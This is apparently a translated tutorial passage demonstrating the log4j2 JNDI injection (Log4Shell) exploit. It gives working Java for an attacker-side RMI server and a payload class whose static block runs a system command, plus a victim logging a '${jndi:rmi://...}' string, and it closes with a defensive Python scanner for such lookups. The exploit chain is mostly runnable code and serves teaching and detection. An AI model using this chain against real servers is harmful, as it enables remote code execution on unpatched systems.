2. Attack code block (attacker side)
Maven dependencies: org.projectlombok:lombok:1.16.18, org.apache.logging.log4j:log4j-slf4j-impl:2.14.0
The commands to be executed are not shown here; adapt them as you like. Seeing the log output printed is enough to count as success.
public class Sout {
    // Static initializer: runs as soon as the class is loaded on the victim side
    static {
        System.out.println("guess who am I ~~");
        System.out.println("开始执行代码...");
        String[] commands = {"open", "......"};   // actual command elided by the author
        try {
            Process process = Runtime.getRuntime().exec(commands);
            process.waitFor();
        } catch (Exception e) {
            e.printStackTrace();
        }
        System.out.println("执行完成。");
    }
}
3. JNDI server (attacker side); note the imported packages
import com.sun.jndi.rmi.registry.ReferenceWrapper;
import javax.naming.Reference;
import java.rmi.registry.LocateRegistry;
import java.rmi.registry.Registry;

public class Server {
    public static void main(String[] args) {
        try {
            // RMI registry on port 8888, the port referenced from the victim's log message
            Registry registry = LocateRegistry.createRegistry(8888);
            // Reference naming the class the victim will load when it resolves "Server"
            Reference reference = new Reference("com.xxx.jndi.demo2.Sout", "com.xxx.jndi.demo2.Sout", null);
            registry.bind("Server", new ReferenceWrapper(reference));
            System.out.println("RMI服务已启动...");
        } catch (Exception e) {
            e.printStackTrace();
        }
    }
}
4. Server (victim side); the request is simulated here with a hard-coded parameter
import lombok.extern.log4j.Log4j2;

@Log4j2
public class Log4j2Test1 {
    public static void main(String[] args) {
        // Untrusted input containing a log4j2 lookup; logging it triggers the JNDI resolution
        String ref = "${jndi:rmi://127.0.0.1:8888/Server}";
        log.info("test: [{}]", ref);
    }
}
5. Running the demo
(1) First start the attacker's Server.main() to bring up the JNDI service:
Server (attacker JNDI service) log:
(2) Then run Log4j2Test1.main();
Log4j2Test1 (victim service) log:
Note that the log output appears on the Log4j2Test1 (victim) side, which shows the injection succeeded.
Through commands, far more dangerous operations are possible.
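From the defender's side, the string logged in step 4 is exactly what to hunt for in access and application logs. As an added example (not part of the original post), the following scanner flags the ${jndi:...} lookup syntax shown above; the log lines it scans are constructed samples, and the demo's 127.0.0.1:8888/Server value is reused from the page.

```python
"""Scan log lines for log4j2 JNDI lookup strings (defensive detection only)."""
import re
from dataclasses import dataclass
from typing import List

# Shape of the lookup used in the demo: ${jndi:<scheme>:<target>}.
# IGNORECASE so that mixed-case spellings of "jndi" or of the scheme are not missed.
JNDI_LOOKUP = re.compile(
    r"\$\{\s*jndi\s*:\s*(?P<scheme>[A-Za-z][A-Za-z0-9+.-]*)\s*:\s*(?P<target>[^}]*)\}",
    re.IGNORECASE,
)


@dataclass(frozen=True)
class Finding:
    line_no: int
    scheme: str   # rmi, ldap, dns, ...
    target: str   # host:port/name the vulnerable logger would connect out to


def scan_lines(lines: List[str]) -> List[Finding]:
    """Return one Finding per ${jndi:...} lookup, in order of appearance."""
    findings = []
    for no, line in enumerate(lines, start=1):
        for m in JNDI_LOOKUP.finditer(line):
            findings.append(Finding(
                line_no=no,
                scheme=m.group("scheme").lower(),
                target=m.group("target").strip().lstrip("/"),
            ))
    return findings


# Constructed sample (not a real capture): the page's demo lookup arriving in the
# User-Agent field of an access log, next to a benign request.
SAMPLE_LOG = [
    '10.0.0.5 - - [10/Dec/2021:10:00:01 +0000] "GET / HTTP/1.1" 200 "-" '
    '"${jndi:rmi://127.0.0.1:8888/Server}"',
    '10.0.0.6 - - [10/Dec/2021:10:00:02 +0000] "GET /index.html HTTP/1.1" 200 "-" '
    '"Mozilla/5.0"',
    # The same lookup as a patched logger records it: verbatim, unresolved, mixed case.
    'Log4j2Test1 INFO test: [${JNDI:rmi://127.0.0.1:8888/Server}]',
]


if __name__ == "__main__":
    for f in scan_lines(SAMPLE_LOG):
        print(f"line {f.line_no}: JNDI lookup via {f.scheme} -> {f.target}")
```

The scanner only matches the plain form used on this page; any ${...} lookup arriving in untrusted input is worth reviewing, and the real fix is upgrading log4j beyond 2.14.0 so message lookups are no longer resolved.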